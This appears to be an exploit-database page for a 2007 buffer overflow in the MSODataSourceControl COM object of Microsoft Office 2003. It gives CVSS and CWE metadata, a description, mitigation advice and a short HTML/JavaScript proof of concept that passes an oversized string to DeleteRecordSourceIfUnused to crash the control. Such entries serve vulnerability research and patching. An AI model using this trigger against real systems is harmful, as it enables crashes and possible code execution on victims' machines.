header-logo
Suggest Exploit
vendor:
Microsoft Office
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Microsoft Office
Affected Version From: Microsoft Office 2003
Affected Version To: Microsoft Office 2003
Patch Exists: NO
Related CWE:
CPE: a:microsoft:office:2003
Metasploit:
Other Scripts:
Platforms Tested: Windows XP/SP2, Internet Explorer 7, Microsoft Office 2003
2007

MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC

This exploit targets the MSODataSourceControl.DeleteRecordSourceIfUnused COM-object in Microsoft Office 2003. By passing a large string as an argument to the DeleteRecordSourceIfUnused method, a buffer overflow vulnerability can be triggered, potentially leading to remote code execution. This Proof of Concept (POC) script demonstrates the vulnerability.

Mitigation:

Apply the latest security patches and updates from Microsoft to mitigate this vulnerability. Additionally, consider upgrading to a newer version of Microsoft Office.
Source

Exploit-DB raw data:

MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003

<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = 'AAAA';
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>

# milw0rm.com [2007-06-13]

Navigation

Suggest Exploit

Services By CQR